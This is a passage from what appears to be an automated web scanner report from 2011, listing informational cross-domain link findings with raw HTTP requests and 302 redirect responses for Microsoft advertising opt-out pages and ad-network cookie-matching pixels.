Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?optout&nocache=0.7367049 HTTP/1.1
Host: choice.live.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wla42=

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.msn.com/AdvertisementChoice/opt.out?optout&nocache=0.7367049
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: TOptOut=1; domain=.live.com; expires=Sun, 04-Sep-2016 11:23:56 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 11:23:55 GMT
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.msn.com/AdvertisementChoice/opt.out?optout&amp;nocache=0.7367049">here</a>.</h2>
</body></html>

21.37. http://choice.live.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.live.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.1212565 HTTP/1.1
Host: choice.live.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wla42=

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.msn.com/AdvertisementChoice/opt.out?Verify&nocache=0.1212565
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 11:04:00 GMT
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.msn.com/AdvertisementChoice/opt.out?Verify&amp;nocache=0.1212565">here</a>.</h2>
</body></html>

21.38. http://choice.live.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.live.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?VerifyOptOut HTTP/1.1
Host: choice.live.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wla42=; TOptOut=1

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.msn.com/AdvertisementChoice/opt.out?VerifyOptOut
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 11:29:22 GMT
Content-Length: 179

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.msn.com/AdvertisementChoice/opt.out?VerifyOptOut">here</a>.</h2>
</body></html>

21.39. http://choice.microsoft.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.microsoft.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?optout&nocache=0.7367049 HTTP/1.1
Host: choice.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.live.com/AdvertisementChoice/opt.out?VerifyOptOut
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: TOptOut=1; domain=.microsoft.com; expires=Sun, 04-Sep-2016 11:26:29 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 11:26:29 GMT
Content-Length: 180

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.live.com/AdvertisementChoice/opt.out?VerifyOptOut">here</a>.</h2>
</body></html>

21.40. http://choice.microsoft.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.microsoft.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?VerifyOptOut HTTP/1.1
Host: choice.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; TOptOut=1

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://www.networkadvertising.org/optout/opt_success.gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 11:34:27 GMT
Content-Length: 173

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>.</h2>
</body></html>

21.41. http://choice.microsoft.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.microsoft.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.7556559 HTTP/1.1
Host: choice.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; TOptOut=1

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 11:44:53 GMT
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>

21.42. http://choice.msn.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.msn.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?optout&nocache=0.7367049 HTTP/1.1
Host: choice.msn.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1162228222-1314847229546; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; Sample=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.bing.com/AdvertisementChoice/opt.out?optout&nocache=0.7367049
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: TOptOut=1; domain=.msn.com; expires=Sun, 04-Sep-2016 11:24:05 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 11:24:04 GMT
Content-Length: 196

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.bing.com/AdvertisementChoice/opt.out?optout&amp;nocache=0.7367049">here</a>.</h2>
</body></html>

21.43. http://choice.msn.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.msn.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?VerifyOptOut HTTP/1.1
Host: choice.msn.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1162228222-1314847229546; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; Sample=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.bing.com/AdvertisementChoice/opt.out?VerifyOptOut
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 11:31:32 GMT
Content-Length: 180

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.bing.com/AdvertisementChoice/opt.out?VerifyOptOut">here</a>.</h2>
</body></html>

21.44. http://choice.msn.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.msn.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.1212565&Unknown HTTP/1.1
Host: choice.msn.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1162228222-1314847229546; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; Sample=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://www.networkadvertising.org/verify/cookie_exists.gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 11:04:33 GMT
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_exists.gif">here</a>.</h2>
</body></html>

21.45. http://choice.msn.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.msn.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.7556559 HTTP/1.1
Host: choice.msn.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1162228222-1314847229546; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; Sample=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.bing.com/AdvertisementChoice/opt.out?Verify&nocache=0.7556559
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 11:43:36 GMT
Content-Length: 196

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.bing.com/AdvertisementChoice/opt.out?Verify&amp;nocache=0.7556559">here</a>.</h2>
</body></html>

21.46. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=aol1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 302 Found
Location: http://cmap.dc.ace.advertising.com/dccm.ashx?id=CAESEHgijFrzaBV3XygitFK4FuI&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 04 Sep 2011 02:27:22 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://cmap.dc.ace.advertising.com/dccm.ashx?id=CAESEHgijFrzaBV3XygitFK4FuI&amp;cver=1">here</A>
...[SNIP]...

21.47. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=c44786835&CriteoUserId=6731d4ad-7dae-4402-b507-a0bc233d79fb&rtbId=4 HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 302 Found
Location: http://dis.criteo.com/dis/rtb/google/cookiematch.aspx?id=CAESEHeIQnjMnPaFbJZZGOdlsHI&cver=1&CriteoUserId=6731d4ad-7dae-4402-b507-a0bc233d79fb&rtbId=4
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 04 Sep 2011 02:36:33 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 358
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://dis.criteo.com/dis/rtb/google/cookiematch.aspx?id=CAESEHeIQnjMnPaFbJZZGOdlsHI&amp;cver=1&amp;CriteoUserId=6731d4ad-7dae-4402-b507-a0bc233d79fb&amp;rtbId=4">here</A>
...[SNIP]...

21.48. http://cms.ad.yieldmanager.net/v1/cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cms.ad.yieldmanager.net
Path:   /v1/cms

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578 HTTP/1.1
Host: cms.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=245

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 03:05:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://cmap.rm.ace.advertising.com/ycms.ashx?xid=13Z9TouM4tArc.ytHun9whMB
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 788

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 03:05:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PU
...[SNIP]...
p.rm.ace.advertising.com/ycms.ashx?xid=13Z9TouM4tArc.ytHun9whMB
Cache-Control: private
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

The document has moved <A HREF="http://cmap.rm.ace.advertising.com/ycms.ashx?xid=13Z9TouM4tArc.ytHun9whMB">here</A>
...[SNIP]...

21.49. http://core.videoegg.com/eap/14533/html/jstags.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.videoegg.com
Path:   /eap/14533/html/jstags.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /eap/14533/html/jstags.html?CCID=1977158-1&r=0.35500167799182236 HTTP/1.1
Host: core.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1918458103-1315103284399

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "c1285707168d4ed3b69ca3d4b048c0f4:1314219624"
